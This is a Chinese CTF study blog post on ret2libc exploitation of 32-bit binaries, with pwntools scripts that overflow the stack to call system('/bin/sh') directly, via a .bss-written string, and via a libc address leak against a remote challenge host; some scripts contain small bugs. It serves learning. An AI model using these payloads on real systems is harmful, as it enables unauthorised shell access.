学习ret2libc手法记录

ret2libc原理(动态编译)

ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。


ret2libc1

老规矩拿道题的第一步检查保护机制和多少位程序:(checksec ret2libc)


NX保护/32位程序

用IDA打开找到main函数F5查看伪代码


看到了gets函数可能存在栈溢出漏洞

发现了system的地址


system地址0x8048460

shift+f12看看有没有/bin/sh



/bin/sh地址0x8048720

思路大概就有了,通过溢出,跳转到到system函数执行”/bin/sh”拿shell。这里我们需要注意函数调用栈的结构,如果是正常调用 system 函数,我们调用的时候会有一个对应的返回地址,这里以填入任意字节比如'aaaa' 作为虚假的地址,其后参数对应的参数内容。

最后计算一下偏移量(112)


偏移量为112

exp如下

from pwn import*

 p = process("./ret2libc1")

#r = remote('ip',port)

bin_sh = 0x8048720

sys_addr = 0x8048460

payload = 'a'*112 + p32(sys_addr) + p32(0x1) + p32(bin_sh)

p.sendline(payload)

p.interactive()

ret2libc2

ret2libc2和ret2libc1的区别在于没有了 "/bin/sh" 字符串,需要通过 gets 函数写到一个可读可写的地方,通常会找 bss 段,然后去执行 /bin/sh


查看保护机制和多少位程序(checksec ret2libc2)


NX/32位

NX保护32位扔进IDA

sys_addr=0x8048490/get_addr=0x8048460

可能存在栈溢出也有system地址 shift+F12看一眼有没有/bin/sh


没有/bin/sh字串,所以需要我们自己需要通过gets把它写入.bss段,然后作为参数给system

找一下bass段的地址\downarrow

readelf -S ret2libc2 | grep bss

bss_addr=0x804A040

再用vmmap检测一下bass段权限

gdb -q ret2libc2

start

vmmap

具有可读可写可执行权限

通过查找,可以找到的数据如下:

sys_addr=0x8048490

bss_addr=0x804A040

get_addr=0x8048460

在计算偏移量为(112)

exp1如下

from pwn import*

p = process("./ret2libc2")

#r = remote('ip',port)

sys_addr=0x8048490

get_addr=0x8048460

bss_addr=0x804A040

payload = 'a'*112 + p32 (get_addr) + p32(sys_addr) +p32(bss_addr) + p32(bss_addr)

p.sendline(payload)

p.sendline('/bin/sh')

p.interactive()


exp1栈结构

exp2如下

from pwn import*

p = process("./ret2libc2")

sys_addr=0x8048490

get_addr=0x8048460

bss_addr=0x804A040

pop_ret = 0x0804843d

payload = ''

payload += 'a'*112

payload += p32(gets_addr)

payload += p32(pop_ret)

payload += p32(bss_addr)

payload += p32(sys_addr)

payload += 'a'*4

payload += p32(bss_addr)

p.sendline(payload)

p.sendline('/bin/sh\')

p.interactive()

#寻找pop_ret:ROPgadget –binary ret2libc2 –only ‘pop|ret’| grep ‘ebx’


exp2栈布局

ret2libc3手法

动态编译的程序中真实地址=偏移地址+基地址,不同版本的libc库,其偏移不同,我们我们可以通过libc库版本去寻找每个函数的偏移,泄露已知函数的真实地址去计算其基地址,从而构造出system的函数的真实地址。


ret2libc3和ret2libc2和ret2libc1的区别在于没有 system 也没有 /bin/sh,需要使用 libc 中的 system 和 /bin/sh,知道了libc中的一个函数的地址就可以确定该程序利用的 libc,从而知道其他函数的地址。获得 libc 的某个函数的地址通常采用的方法是:通过 got 表泄露,但是由于libc的延迟绑定,需要泄露的是已经执行过的函数的地址

拿到题先查看一下保护机制


NX/32位

扔进ida观察

没有看到system


可能存在栈溢出

shift+f12看一眼有没有/bin/sh字符串


并没有/bin/sh

既然存在栈溢出就确定偏移量


偏移量为140

思路如下

\bullet 通过第一次溢出,通过将 puts 的 PLT 地址放到返回处,泄漏出执行过的函数的 GOT 地址(实际上 write 的就可以)

\bullet 将 write 的返回地址设置为 _start 函数(main () 函数是用户代码的入口,是对用户而言的;而_start () 函数是系统代码的入口,是程序真正的入口),方便再次用来执行 system('/bin/sh')

\bullet 通过泄露的函数的 GOT 地址计算出 libc 中的 system 和 /bin/sh 的地址

\bullet 再次通过溢出将返回地址覆盖成泄露出来的 system 的地址 getshell

exp如下

from pwn import *

from LibcSearcher import *

 #导入LibcSearch模块

r = remote('111.198.29.45',51596)

elf = ELF('./level3')

write_plt = elf.plt['write']

#要利用的函数

write_got = elf.got['write']

#要泄露的函数的GOT地址,里面的内容即真实地址

main_addr = elf.symbols['main']

#返回地址为main,使其还可溢出

payload = 'a'*140+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)r.recv()r.sendline(payload)write_addr = u32(r.recv()[:4])

#发送payload后会接收到write的真实地址

libc = LibcSearcher('write',write_addr)

#利用LibcSearcher寻找libc版本

base = write_addr - libc.dump('write')

#.dump为偏移地址

sys_addr = base + libc.dump('system')

sh_addr = base +libc.dump('str_bin_sh')

payload2 = 'a'*140 +p32(sys_addr)+'b'*4+p32(sh_addr)

r.recv()

r.sendline(payload2)

r.interactive()


知识补充:

动态编译与静态编译

1、动态编译的可执行文件需要附带一个的动态链接库(libc库),在执行时,需要调用其对应动态链接库中的命令。所以其优点一方面是缩小了执行文件本身的体积,另一方面是加快了编译速度,节省了系统资源。缺点一是哪怕是很简单的程序,只用到了链接库中的一两条命令,也需要附带一个相对庞大的链接库;二是如果其他计算机上没有安装对应的运行库,则用动态编译的可执行文件就不能运行。

2、静态编译就是编译器在编译可执行文件的时候,将可执行文件需要调用的对应动态链接库(.so)中的部分提取出来,链接到可执行文件中去,使可执行文件在运行的时候不依赖于动态链接库。所以其优缺点与动态编译的可执行文件正好互补。

GOT表和PLT表

在目前的 C 程序中,libc中的函数都是通过 GOT 表来跳转的。通过PLT表作为中间表链接call命令和got表,而got表中的内容是函数的真实地址。在一些pwn题中,要泄漏出的函数地址应该是got表中的内容,为了泄漏这些真正的地址,往往会用到read,write,put等函数,通过已知同时存在于got和libc的函数地址,可以得出偏移量,接着就能通过偏移量找到system函数的真正地址,从而进行ret2libc操作.

摘自某大佬博客



推荐其他的师傅wp:

ATFWUS

YeeZi_

西杭

ret2libc3

此篇文章如果存在问题,还望大佬批评指正

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,402评论 6 499
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,377评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,483评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,165评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,176评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,146评论 1 297
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,032评论 3 417
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,896评论 0 274
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,311评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,536评论 2 332
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,696评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,413评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,008评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,659评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,815评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,698评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,592评论 2 353